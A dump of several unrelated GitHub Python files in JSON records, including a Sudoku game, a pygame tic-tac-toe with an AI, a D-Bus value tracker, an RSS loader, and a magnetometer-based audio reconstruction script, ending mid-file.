value, board_obj):\n \"\"\"\n This function validates that the passed row, col, and value are valid\n :param row: The row to be checked\n :param col: The column to be checked\n :param value: The value to be checked\n :param board_obj: The SudokuBoard object.\n :return: True or False\n \"\"\"\n\n if value <= 9 and row <= 9 and col <= 9:\n temp_tup = (row, col)\n if temp_tup not in board_obj.banned_moves:\n return True\n else:\n return False\n else:\n return False\n\n def add_value(self, row, col, value, board_obj):\n \"\"\"\n This function updates the Sudokuboard with the valid move.\n :param row: The row to be updated\n :param col: The col to be updated\n :param value: The value to be inserted at [row][col] position.\n :param board_obj: SudokuBoard object.\n :return: True or String\n \"\"\"\n square = board_obj.get_squares(row,col)\n\n if self.input_validations(row, col, value, board_obj) is True:\n if board_obj.is_move_legal(self,row,col,value) is True:\n board_obj.update_board(row, col, value)\n return True\n else:\n print(\"Try another value\")\n else:\n print(\"Try another value between 0-9\")\n\n def check_row(self,row, val, board_obj):\n \"\"\"\n Checks whether the proposed value already occurs in the row\n :param row: The row to be checked\n :param val: The value to be checked\n :param board_obj: SudokuBoard object\n :return: True or False\n \"\"\"\n used_nums = []\n\n for i in range(9):\n temp_val = board_obj.get_board_value(row, i)\n if temp_val == 0:\n pass\n else:\n if temp_val not in used_nums:\n used_nums.append(temp_val)\n if val in used_nums:\n return False\n else:\n return True\n\n def check_col(self, col, val, board_obj):\n \"\"\"\n :Checks whether the proposed value already occurs in the column\n :param col: The col to be checked\n :param val: The value to be checked\n :param board_obj: SudokuBoard object\n :return: True or False\n \"\"\"\n used_nums = []\n\n for i in range(9):\n temp_val = board_obj.get_board_value(i, col)\n if temp_val == 0:\n pass\n else:\n if temp_val not in used_nums:\n used_nums.append(temp_val)\n\n if val in used_nums:\n return False\n else:\n return True\n\n def check_square(self, square, val, board_obj):\n \"\"\"\n Checks whether the proposed value already occurs in the subgrid\n :param square: The tuple representation the subgrid\n :param val: The value to be checked\n :param board_obj: SudokuBoard object\n :return: True or False\n \"\"\"\n\n used_nums = []\n rows = square[0]\n cols = square[1]\n\n for i in range(rows[0], rows[1] + 1):\n for y in range(cols[0], cols[1] + 1):\n temp_val = board_obj.get_board_value(i, y)\n if temp_val == 0:\n pass\n elif temp_val not in used_nums:\n used_nums.append(temp_val)\n if val in used_nums:\n return False\n else:\n return True\n\n\ndef diff_level_function():\n \"\"\"\n Runs automatically when the program is run. Prompt's the user for a valid difficulty and\n calls the SudokuGame and SudokuBoard classes so that the game cab be played\n :return: None\n \"\"\"\n diff_level = input(\"Easy, Medium, Hard, Brute Force, or Verify? \")\n\n if diff_level == \"Easy\" or diff_level == \"easy\":\n game = SudokuBoard(\"Easy\")\n elif diff_level == \"Medium\" or diff_level == \"medium\":\n game = SudokuBoard(\"Medium\")\n elif diff_level == \"Hard\" or diff_level == \"hard\":\n game = SudokuBoard(\"Hard\")\n elif diff_level == \"Brute Force\" or diff_level == \"brute force\":\n game = SudokuBoard(\"Brute Force\")\n elif diff_level == \"Verify\" or diff_level == \"Verify\":\n game = SudokuBoard(\"Verify\")\n else:\n print(\"You'll need to enter a difficulty level\")\n diff_level_function()\n\n\ndiff_level_function()\n","repo_name":"TaylorGooge/Sudoku_Game","sub_path":"sudoku_game.py","file_name":"sudoku_game.py","file_ext":"py","file_size_in_byte":21766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35980239088","text":"n1 = int (input('Um valor: '))\nn2 = int (input('Outro valor: '))\n\nsoma = n1+n2\nmult = n1*n2\ndiv = n1/2\ndivint = n1//n2\nsobradiv = n1%n2\npot = n1**n2\n\nprint ('a soma é {}, a multiplicação é {}, a divisão é {} a divisão inteira é {}'.format(soma,mult,div,divint), end=' ')\nprint ('e a potencia é {}'.format (pot))\n","repo_name":"FilipeBorsari/GuanabaraPython","sub_path":"Ex007.py","file_name":"Ex007.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42934125804","text":"from hymn.types.maybe import Just, Nothing, is_nothing\nfrom pyherc.aspects import log_debug, log_info\n\n\nclass ActionFactory():\n \"\"\"\n Object for creating actions\n \"\"\"\n\n @log_debug\n def __init__(self, model, factories):\n \"\"\"\n Construct ActionFactory\n\n Args:\n model: model to register for the factory\n factories: a single Factory or list of Factories to use\n \"\"\"\n super().__init__()\n\n if hasattr(factories, '__iter__'):\n self.factories = factories\n else:\n self.factories = []\n self.factories.append(factories)\n\n self.model = model\n\n def __call__(self, parameters):\n \"\"\"\n Temporary magic method to make this behave like a function\n\n returns:\n Just(Action) when creation of Action was possible\n Nothing when creation of Action was not possible\n \"\"\"\n iterator = iter(self.factories)\n res = Nothing\n for fn in iter(self.factories):\n res = fn(parameters)\n if not is_nothing(res):\n return res\n return Nothing\n\n @log_info\n def get_action(self, parameters):\n \"\"\"\n Create an action\n\n Args:\n parameters: Parameters used to control action creation\n \"\"\"\n factory = self.get_sub_factory(parameters)\n assert factory is not None, 'suitable factory not configured'\n return factory.get_action(parameters)\n\n @log_debug\n def get_sub_factories(self):\n \"\"\"\n Get all sub factories\n\n Returns:\n List of sub factories\n \"\"\"\n return self.factories\n\n @log_debug\n def get_sub_factory(self, parameters):\n \"\"\"\n Get sub factory to handle parameters\n\n Args:\n parameters: Parameters to use for searching the factory\n\n Returns:\n Sub factory if found, None otherwise\n \"\"\"\n subs = [x for x in self.factories if x.can_handle(parameters)]\n\n if len(subs) == 1:\n return subs[0]\n else:\n return None\n","repo_name":"tuturto/pyherc","sub_path":"src/pyherc/rules/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"6"} +{"seq_id":"29462947439","text":"from functools import partial\nfrom collections import defaultdict\nfrom cache import smart_dict\nimport dbus\n\nclass Tracker(object):\n\tdef __init__(self):\n\t\tself.cache = smart_dict()\n\t\tself.watches = defaultdict(list)\n\n\tdef unwrap_dbus_value(self, val):\n\t\t# Converts D-Bus values back to the original type. For example if val is of type DBus.Double, a float will be returned.\n\t\tif isinstance(val, (dbus.Int32, dbus.UInt32, dbus.Byte, dbus.Int16, dbus.UInt16, dbus.UInt32, dbus.Int64, dbus.UInt64)):\n\t\t\treturn int(val)\n\t\tif isinstance(val, dbus.Double):\n\t\t\treturn float(val)\n\t\tif isinstance(val, dbus.String):\n\t\t\treturn str(val)\n\n\t\treturn val\n\n\tdef update_cache(self, callback, key, v):\n\t\tif isinstance(v, dbus.Dictionary):\n\t\t\tvalue = v[\"Value\"]\n\t\telif isinstance(v, dbus.Array):\n\t\t\tvalue = None\n\t\telse:\n\t\t\tvalue = v\n\n\t\tif isinstance(value, dbus.Array):\n\t\t\tvalue = None\n\n\t\tself.cache[key] = v = self.unwrap_dbus_value(value)\n\t\tif callback is not None:\n\t\t\tcallback(v)\n\n\tdef query(self, conn, service, path):\n\t\ttry:\n\t\t\treturn conn.call_blocking(service, path, None, \"GetValue\", '', [])\n\t\texcept:\n\t\t\treturn None\n\n\tdef track(self, conn, service, path, target, callback=None):\n\n\t\t# Initialise cache values\n\t\tself.update_cache(callback, target, self.query(conn, service, path))\n\n\t\t# If there are values on dbus update cache after property change\n\t\tself.watches[service].append((target, conn.add_signal_receiver(\n\t\t\tpartial(self.update_cache, callback, target),\n\t\t\tdbus_interface='com.victronenergy.BusItem',\n\t\t\tsignal_name='PropertiesChanged',\n\t\t\tpath=path,\n\t\t\tbus_name=service\n\t\t)))\n\n\t\t# ItemsChanged\n\t\tdef update_items(items):\n\t\t\ttry:\n\t\t\t\tself.update_cache(callback, target, items[path])\n\t\t\texcept (TypeError, KeyError):\n\t\t\t\tpass\n\n\t\tself.watches[service].append((target, conn.add_signal_receiver(\n\t\t\tupdate_items,\n\t\t\tdbus_interface='com.victronenergy.BusItem',\n\t\t\tsignal_name='ItemsChanged',\n\t\t\tpath='/',\n\t\t\tbus_name=service\n\t\t)))\n\n\tdef cleanup(self, name):\n\t\tif name in self.watches:\n\t\t\tfor target, w in self.watches[name]:\n\t\t\t\tw.remove()\n\t\t\t\tself.update_cache(None, target, None)\n\t\t\tdel self.watches[name]\n","repo_name":"victronenergy/dbus-characterdisplay","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23762216049","text":"#!/usr/bin/python\nimport sys\nimport feedparser #rss parser\nimport intersys.pythonbind3\nfrom time import gmtime, strftime, localtime\nfrom twTOM import getprops\n\ndef saveToDB(parsedObj, category):\n secrets = getprops(\"WIBIS.properties\")\n user = secrets['USERNAME'];\n password = secrets['PASSWORD'];\n host = secrets['HOST'];\n port = secrets['PORT'];\n\n try:\n url = host+\"[\"+port+\"]:SMSWIBIS\"\n conn = intersys.pythonbind3.connection()\n conn.connect_now(url, user, password, None)\n database = intersys.pythonbind3.database(conn)\n\n if (len(parsedObj.entries)!=0):\n entries = parsedObj.entries\n for entry in entries:\n entryTimeStamp = convertToLocal(entry['published_parsed'])\n sc = database.run_class_method('%BI.RSSTemp','FetchData',[entry.summary, entry.title, category, entry.link, entry.id, entryTimeStamp[0], entryTimeStamp[1]])\n #print(sc);\n #print(entry.title);\n\n except intersys.pythonbind3.cache_exception ( err ):\n print (\"InterSystems Cache' exception\")\n print (sys.exc_type)\n print (sys.exc_value)\n print (sys.exc_traceback)\n print (str(err))\n\ndef parseRSS(link):\n d = feedparser.parse(link)\n return d\n\ndef convertToLocal(ts):\n from datetime import datetime\n from dateutil import tz\n from time import gmtime, strftime, localtime\n\n thisDate = strftime('%d/%m/%Y', ts)\n thisTime = strftime('%H:%M:%S', ts)\n\n from_zone = tz.tzutc()\n to_zone = tz.tzlocal()\n utc = datetime.strptime(thisDate + ' ' + thisTime, '%d/%m/%Y %H:%M:%S')\n utc = utc.replace(tzinfo=from_zone)\n local = utc.astimezone(to_zone)\n localTime = '{:%H:%M:%S}'.format(local)\n return (thisDate, localTime)\n\n\nlink = sys.argv[1]\ncategory = sys.argv[2]\nrssObj = parseRSS(link)\nsaveToDB(rssObj, category)\n","repo_name":"qayyuum85/TestScript","sub_path":"RSSParsertoCacheWIBIS.py","file_name":"RSSParsertoCacheWIBIS.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26715873704","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 12 17:29:39 2018\n\n@author: dumapath\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nx = [0,1,2,3,4,5]\ny = [10,20,15,18,7,19]\nxlabels = ['jan','feb','mar','apr','may','jun']\n\nxlabelsnew = []\nfor i in xlabels:\n if i in []:\n i = ' '\n xlabelsnew.append(i)\n else:\n xlabelsnew.append(i)\n \nplt.plot(x,y)\nplt.xticks(range(0,len(x)),xlabelsnew,rotation=45)\nplt.show()","repo_name":"Darshan1917/matplotlib_basics","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"44855964026","text":"#https://leetcode.com/problems/subsets/submissions/\nclass Solution:\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if nums == []:\n return []\n ans = []\n for num in nums:\n ans.append([num])\n \n subs = ans\n while len(subs)!=1:\n nex = []\n for sub in subs:\n shouldapp = False\n for num in nums:\n if not shouldapp and num == sub[-1]:\n shouldapp = True\n \n \n elif shouldapp:\n nex.append(sub+[num])\n [ans.append(x) for x in nex]\n subs = nex\n ans.append([])\n return ans\n\n\ns = Solution()\nprint(s.subsets([1,2,3,4]))","repo_name":"sandeepjoshi1910/Algorithms-and-Data-Structures","sub_path":"powerset.py","file_name":"powerset.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1141040273","text":"import pygame\nimport sys\nimport time\n\nfrom tictactoe import TicTacToe\n\npygame.init()\nsize = width, height = 400, 600\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Tic Tac Toe vs AI\")\n\nlogo_file = \"./assets/img/logo.png\"\nlogo_image = pygame.image.load(logo_file)\nlogo_image = pygame.transform.scale(logo_image, (32, 32))\npygame.display.set_icon(logo_image)\n\nbg_file = \"./assets/img/bg_image.jpg\"\nbg_image = pygame.image.load(bg_file)\nbg_image = pygame.transform.scale(bg_image, size)\n\nfont_file = \"./assets/font/Catskin.otf\"\nmediumFont = pygame.font.Font(font_file, 35)\nsmallFont = pygame.font.Font(font_file, 25)\nlargeFont = pygame.font.Font(font_file, 80)\nllargeFont = pygame.font.Font(font_file, 55)\nmoveFont = pygame.font.Font(font_file, 60)\n\nuser = None\ngame_board = TicTacToe()\nai_turn = False\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n screen.blit(bg_image, bg_image.get_rect())\n\n # Player memilih\n if user is None:\n # Title\n title = largeFont.render(\"Tic-Tac-Toe\", True, white)\n titleRect = title.get_rect()\n titleRect.center = ((width/ 2), 180)\n screen.blit(title, titleRect)\n\n # Button X\n playXButton = pygame.Rect(5*(width / 8), (height / 2), width / 2.5, 50)\n playX = mediumFont.render(\"Play as X\", True, black)\n playXRect = playX.get_rect()\n playXButton.center=((width / 2), 300)\n playXRect.center = playXButton.center\n pygame.draw.rect(screen, white, playXButton,border_top_right_radius=20,\n border_bottom_right_radius=20,border_bottom_left_radius=20,\n border_top_left_radius=20)\n screen.blit(playX, playXRect)\n\n # Button O\n playOButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n playO = mediumFont.render(\"Play as O\", True, black)\n playORect = playO.get_rect()\n playOButton.center=((width / 2), 370)\n playORect.center = playOButton.center\n pygame.draw.rect(screen, white, playOButton,border_top_right_radius=20,\n border_bottom_right_radius=20,border_bottom_left_radius=20,\n border_top_left_radius=20)\n screen.blit(playO, playORect)\n\n #Exit Button\n exitButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n exit = mediumFont.render(\"Exit\", True, black)\n exitRect = exit.get_rect()\n exitButton.center=((width / 2), 440)\n exitRect.center = exitButton.center\n pygame.draw.rect(screen, white, exitButton,border_top_right_radius=20,\n border_bottom_right_radius=20,border_bottom_left_radius=20,\n border_top_left_radius=20)\n screen.blit(exit, exitRect)\n\n # Cek jika button diklik\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if playXButton.collidepoint(mouse):\n time.sleep(0.2)\n user = TicTacToe.X\n elif playOButton.collidepoint(mouse):\n time.sleep(0.2)\n user = TicTacToe.O\n elif exitButton.collidepoint(mouse):\n time.sleep(0.2)\n pygame.quit()\n # tictactoe board\n else:\n # Game board\n tile_size = 80\n tile_origin = (width / 2 - (1.5 * tile_size),\n height / 3 - (1.5 * tile_size))\n tiles = []\n for i in range(3):\n row = []\n for j in range(3):\n rect = pygame.Rect(\n tile_origin[0] + j * tile_size,\n tile_origin[1] + i * tile_size,\n tile_size, tile_size\n )\n pygame.draw.rect(screen, white, rect, 3)\n if game_board.state[i][j] != TicTacToe.EMPTY:\n move = moveFont.render(game_board.state[i][j], True, white)\n moveRect = move.get_rect()\n moveRect.center = rect.center\n screen.blit(move, moveRect)\n row.append(rect)\n tiles.append(row)\n\n game_over = game_board.terminal(game_board.state)\n player = game_board.player(game_board.state)\n\n # Tunjukkan tittle\n if game_over:\n winner = game_board.winner(game_board.state)\n if winner is None:\n title = f\"Game Over : Seri\"\n else:\n player_winner = \"AI\" if not ai_turn else \"You\"\n title = f\"Game Over : {player_winner} Win!\"\n elif user == player:\n title = f\" Current player: {user} \"\n turn = mediumFont.render(\"Your Turn\", True, white)\n titlesRect = turn.get_rect()\n titlesRect.center = ((width / 2), 420)\n screen.blit(turn, titlesRect) \n else:\n title = f\" Current player: {player} \"\n turn = mediumFont.render(\"Wait for Your Turn\", True, white)\n titlesRect = turn.get_rect()\n titlesRect.center = ((width / 2), 420)\n screen.blit(turn, titlesRect) \n \n title = mediumFont.render(title, True, white)\n titleRect = title.get_rect()\n titleRect.center = ((width / 2), 380)\n screen.blit(title, titleRect)\n \n\n # Cek pergerakkan AI\n if user != player and not game_over:\n if ai_turn:\n time.sleep(0.5)\n move = game_board.alpha_beta_search()\n game_board.state = game_board.result(game_board.state, move)\n ai_turn = False\n else:\n ai_turn = True\n\n # Cek pergerakkan user\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1 and user == player and not game_over:\n mouse = pygame.mouse.get_pos()\n for i in range(3):\n for j in range(3):\n if (game_board.state[i][j] == TicTacToe.EMPTY and tiles[i][j].collidepoint(mouse)):\n game_board.state = game_board.result(game_board.state, (i, j))\n\n if game_over:\n #play again\n againButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n again = smallFont.render(\"Play Again\", True, black)\n againRect = again.get_rect()\n againButton.center=((width / 2), 480)\n againRect.center = againButton.center\n pygame.draw.rect(screen, white, againButton,border_top_right_radius=20,\n border_bottom_right_radius=20,border_bottom_left_radius=20,\n border_top_left_radius=20)\n screen.blit(again, againRect)\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if againButton.collidepoint(mouse):\n time.sleep(0.2)\n user = None\n game_board.clear()\n ai_turn = False\n #exit \n exitButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n exit = smallFont.render(\"Exit\", True, black)\n exitRect = exit.get_rect()\n exitButton.center=((width / 2), 540)\n exitRect.center = exitButton.center\n pygame.draw.rect(screen, white, exitButton,border_top_right_radius=20,\n border_bottom_right_radius=20,border_bottom_left_radius=20,\n border_top_left_radius=20)\n screen.blit(exit, exitRect)\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if exitButton.collidepoint(mouse):\n time.sleep(0.2)\n pygame.quit()\n \n else:\n againButton = pygame.Rect(5 * (width / 2), (height / 2), width / 2.5, 50)\n again = smallFont.render(\"Back to Menu\", True, black)\n againRect = again.get_rect()\n againButton.center=((width / 2), 520)\n againRect.center = againButton.center\n pygame.draw.rect(screen, white, againButton,border_top_right_radius=20,\n border_bottom_right_radius=20,border_bottom_left_radius=20,\n border_top_left_radius=20)\n screen.blit(again, againRect)\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if againButton.collidepoint(mouse):\n time.sleep(0.2)\n user = None\n game_board.clear()\n ai_turn = False\n \n pygame.display.flip()\n","repo_name":"wisnupramoedya/KB_Kelompok3_AdversialSearch_Tic-Tac-Toe","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"74486541946","text":"import serial\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom scipy.io import wavfile\nimport os\n\n\nNFFT_S = 20\nNOVERLAT_S = 40\nSHAPE = 51\nlow, high = 4, 10\nSR = 500\nNEW_SR = 2000\n\nNFFT_S = 10\nNOVERLAT_S = 15\nSHAPE = 257\nlow, high = 30, 76\nSR = 500\nNEW_SR = 2000\n\n\n\n\n# NFFT_S = 10\n# NOVERLAT_S = 20\n# SHAPE = 101\n# low, high = 80, 160\n# SR = 500\n# NEW_SR = 2000\n# BAND = 80 # mag 20 acc 80\n# MIN_SUM = 0.002 # mag 15 acc 0.0020\n# SENSORNAME = 'mag'\n# plt.rcParams[\"font.family\"] = \"Times New Roman\"\n\n\ndef my_interpolate(my_signal,length):\n np.linspace(0,len(my_signal),len(my_signal))\n # np.interp(,,a)\n x = np.linspace(0,len(my_signal),len(my_signal),endpoint=False)\n new_x = np.linspace(0,len(my_signal),length,endpoint=False)\n ans = np.interp(new_x,x,my_signal) # 新的x轴 原信号x轴 原信号y轴\n return ans\n\ndef read_wav(filename):\n sampling_freq, audio = wavfile.read(filename)\n return sampling_freq, audio\n\ndef save_json(filename,data):\n save_json = filename\n with open(save_json, 'w') as f:\n json.dump(data, f)\n\n\ndef get_base_freq_modified(mag_magnitude,low,high, MIN_SUM):\n m, n = mag_magnitude.shape\n p = np.zeros((m, n)) # 记录每个时间点内左右可能是谐波的点\n for j in range(n):\n for i in range(low,high):\n now_i = i # now_i 为目前判定为基频的频率值\n # now_sum = get_nearby_m(mag_magnitude, now_i, j)\n idx = 2\n hs = np.array(list(range(1,idx)))*now_i\n new_hs = []\n for hs_i in hs:\n if hs_i <= mag_magnitude.shape[0]:\n # new_hs.append(hs_i)\n for idx in range(-2,3):\n hs_idx = hs_i+idx\n if 0 < hs_idx < mag_magnitude.shape[0]:\n new_hs.append(hs_idx)\n # if hs_i-1>0:\n # new_hs.append(hs_i-1)\n # if hs_i+10:\n new_harmonics[idx] = int(np.mean(tmp_list))\n\n\n # plt.figure()\n # plt.plot(new_harmonics)\n # plt.show()\n\n # for idx,i in enumerate(harmonics):\n # if i!=0:\n # if harmonics[]\n # begin_idx = idx - 2\n # end_idx = idx + 2\n # if begin_idx < 0:\n # begin_idx = 0\n # if end_idx>len(harmonics):\n # end_idx = len(harmonics)\n # tmp_harmonics = harmonics[begin_idx:end_idx]\n # harmonics[idx] = int(np.mean(harmonics))\n\n # minus_harmonics = []\n # for idx,i in enumerate(harmonics):\n\n\n # plt.figure()\n # plt.plot(harmonics)\n # plt.show()\n\n\n return new_harmonics\n # return harmonics\n\n\ndef get_magnitude_mat(Zxx):\n magnitude_mat = np.abs(Zxx)\n return magnitude_mat\n\ndef read_json(filename):\n with open(filename, 'r', encoding='utf8')as fp:\n json_data = json.load(fp)\n return json_data\n\ndef to_12bit_int(raw_data):\n \"\"\"\n 接收到16bit数据,去除4bit最低位没用到的数据\n 把12bit的16进制字符串转化成12bit的补码数值\n\n :param raw_data: 16进制字符串数据\n :return: 磁感应强度 单位mG\n \"\"\"\n # print(raw_data)\n ans = 0\n if len(raw_data) == 4:\n raw_data = raw_data[0:-1]\n raw_data = bin(int(raw_data, 16))\n raw_data = raw_data[2:]\n\n if len(raw_data) != 12:\n for i in range(12-len(raw_data)):\n raw_data = \"0\" + raw_data\n for i in str(raw_data)[1:]:\n ans = ans * 2 + int(i)\n if int(str(raw_data)[0]) == 0:\n ans -= 2048\n return ans*7.8125/10\n\ndef add_zero(s):\n new_s = []\n for i in s:\n new_s.append(i)\n new_s.append(0)\n return new_s\n\ndef mul_minus1(s):\n new_s = []\n for idx,i in enumerate(s):\n new_s.append(i*pow(-1,idx+1))\n return new_s\n\ndef spectrum_transaltion(s):\n new_s0 = add_zero(s)\n new_s1 = mul_minus1(s)\n new_s1 = add_zero(new_s1)\n b, a = signal.butter(8, 0.5, 'lowpass') # 配置滤波器 8 表示滤波器的阶数\n new_s0 = signal.filtfilt(b, a, new_s0) # data为要过滤的信号\n b, a = signal.butter(8, 0.5, 'highpass') # 配置滤波器 8 表示滤波器的阶数\n new_s1 = signal.filtfilt(b, a, new_s1) # data为要过滤的信号\n res = new_s0+new_s1\n # f, t, Zxx = signal.stft(res, fs=sr*2, nperseg=256, noverlap=128)\n # mat = get_magnitude_mat(Zxx)\n # my_plot(mat,sr)\n return res\n\ndef my_plot(mat, y_len):\n plt.figure()\n plt.pcolormesh(np.linspace(0, mat.shape[1], mat.shape[1]),np.linspace(0, y_len, mat.shape[0]), mat, shading='auto', cmap=\"magma\")\n # plt.colorbar()\n plt.show()\n\n\ndef get_new_freq(m, old_freq):\n if old_freq == m*2:\n return 0\n if old_freq == m:\n return m\n if old_freq % m == 0:\n if old_freq/m%2 == 0:\n return 0\n else:\n return m\n while old_freq > m:\n num = int(old_freq/m)\n num = num*m*2\n old_freq = num - old_freq\n # print(old_freq)\n return old_freq\n\n\ndef fold_mat(mat):\n \"\"\"\n fold the mat\n :param mat:\n :return:\n \"\"\"\n # print(\"mat\",mat)\n tmp_mat = mat[::-1]\n test_mat = np.vstack((mat[:-1, :], mat[-1, :], tmp_mat[1:, :]))\n test_mat = np.vstack((test_mat[:-1, :], test_mat[-1, :], test_mat[::-1][1:, :]))\n # test_mat = np.vstack((test_mat[:-1, :], test_mat[-1, :], test_mat[::-1][1:, :]))\n # test_mat = np.vstack((test_mat[:-1, :], test_mat[-1, :], test_mat[::-1][1:, :]))\n test_mat = test_mat[:SHAPE,:]\n return test_mat\n\n\ndef read_mag(mag_data):\n mag = []\n for i in mag_data.split(\" \")[:-1]: # 去掉最后一个回车\n if len(i) > 0:\n # print(to_12bit_int(i))\n mag.append(to_12bit_int(i))\n # plt.figure()\n # plt.plot(mag)\n # plt.show()\n save_json(\"d:/test.json\",{\"data\":mag})\n b, a = signal.butter(8, 2 * 20 / 500, 'highpass') # 配置滤波器 8 表示滤波器的阶数\n mag = signal.filtfilt(b, a, mag) # data为要过滤的信号\n f, t, Zxx = signal.stft(mag, fs=SR, nperseg=int(SR // NFFT_S), noverlap=int(SR // NOVERLAT_S))\n return get_magnitude_mat(Zxx)\n\n\ndef GLA(S, n_iter=100, n_fft=4096, hop_length=None, window='hann',fs=1000):\n hop_length = n_fft//4 if hop_length is None else hop_length\n m_phase = np.exp(2j*np.pi*np.random.rand(*S.shape))\n for i in range(n_iter):\n xi = np.abs(S).astype(np.complex)*m_phase # 原始幅度谱与相位谱组合成ZXX\n m_signal = signal.istft(xi, fs, nfft=n_fft*2,nperseg=n_fft,noverlap=hop_length,boundary = None)[1] # 使用Zxx还原回时域信号\n\n next_xi = signal.stft(m_signal, fs, nfft=n_fft*2,nperseg=n_fft,noverlap=hop_length,padded = False, boundary = None)[2]\n\n m_phase = np.exp(1j*np.angle(next_xi)) # 取相位\n\n xi = np.abs(S).astype(np.complex)*m_phase\n m_signal = signal.istft(xi, fs, nperseg=n_fft,noverlap=hop_length)[1]\n return m_signal\n\n\ndef save_wav(filename,sampling_freq,my_signal):\n my_signal = np.array(my_signal,dtype=\"float\")\n my_signal /= my_signal.max()\n # plt.figure()\n # plt.plot(my_signal)\n # plt.show()\n my_signal *= np.iinfo(np.int32).max\n my_signal = np.asarray(my_signal, dtype=np.int32)\n wavfile.write(filename, sampling_freq, my_signal)\n\ndef sum_xy(xs, ys, mat):\n mat_shape = mat.shape\n tmp_list = []\n for x, y in zip(xs,ys):\n if 0 new_mat[int((i) * (idx-1) + x)][j]:\n # # new_mat[new_i][j]/=4\n # # print(\"!!!!\")\n # pass\n\n\n\n\n\n\n\n # 增加 谐波能量平滑功能\n\n\n # ans_mat = np.zeros((SHAPE, n))\n # for i in range(ans_mat.shape[0]):\n # for j in range(ans_mat.shape[1]):\n # if mat[i][j]>1e-8:\n # new_is = i + x_plus\n # new_js = j + y_plus\n # tmp_list = []\n # for new_i,new_j in zip(new_is,new_js):\n # if 0< new_i 1e-8:\n # tmp_list.append(mat[new_i][new_j])\n #\n # # print(tmp_list)\n # ans_mat[i][j] = np.sum(tmp_list)\n # # ans_mat[i][j] = new_mat[i][j]\n\n # plt.figure()\n # plt.subplot(1, 3, 1)\n # plt.pcolormesh(np.linspace(0, mat.shape[1], mat.shape[1]),np.linspace(0, 250, mat.shape[0]), mat, shading='auto', cmap=\"magma\")\n # plt.colorbar()\n #\n # plt.subplot(1, 3, 2)\n # plt.pcolormesh(np.linspace(0, mat.shape[1], mat.shape[1]), np.linspace(0, 1000, new_mat.shape[0]), new_mat, shading='auto', cmap=\"magma\")\n # plt.colorbar()\n # return ans_mat\n return new_mat\n\n\ndef read_serial(serialPort=\"COM4\",baudRate=115200):\n flg = False\n ser = serial.Serial(serialPort, baudRate, timeout=0.5)\n print(\"参数设置:串口=%s ,波特率=%d\" % (serialPort, baudRate))\n while 1:\n s = ser.readline()\n # if len(s) != 0 and s[0] != 'x':\n s = str(s, \"utf-8\")\n if len(s) > 10 and s[0] == 'M' and s[1] == 'a' and s[2] == 'g':\n print(\"磁力计读取数据中\")\n flg = True\n if len(s) > 10000:\n # print(s)\n flg = False\n print(\"\\n正在恢复语音数据\")\n mat = read_mag(s)\n # my_plot(mat, 250)\n p = get_base_freq_modified(fold_mat(mat), low, high)\n new_mat = get_new_mat(mat, p)\n # my_plot(new_mat, 1000)\n origin_signal = GLA(new_mat, n_fft=int(NEW_SR // NFFT_S), n_iter=100, hop_length=int(NEW_SR / NOVERLAT_S),\n fs=NEW_SR)\n save_wav(\"d:/test.wav\", int(NEW_SR), origin_signal)\n # song = AudioSegment.from_wav(\"d:/test.wav\")\n # play(song)\n os.system(\"d:/test.wav\")\n\n if flg and len(s) == 0:\n print(\"-> \", end=\"\")\n\n# os.system(\"d:/test.wav\")\n# read_serial()\n\n\n\n","repo_name":"zju-muslab/VoiceListener","sub_path":"preprocessing/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"71477020348","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nA = list(map(int, input().split()))\n\ndp = [1 for _ in range(n)]\n# my_list = [int(1e9) for _ in range(n+1)]\n# my_list[1]=A[0]\nfor i in range(1, n):\n for j in range(i):\n if A[i] > A[j]:\n # if dp[i] < dp[j]+1:\n # dp[i] = dp[j]+1\n # my_list[dp[j]+1] = min(A[i], my_list[dp[j]+1])\n\n dp[i] = max(dp[i], dp[j]+1)\nans = max(dp)\nprint(ans)\n# print(*my_list[1:ans+1])\nresult = []\nidx = ans\nfor i in range(n-1, -1, 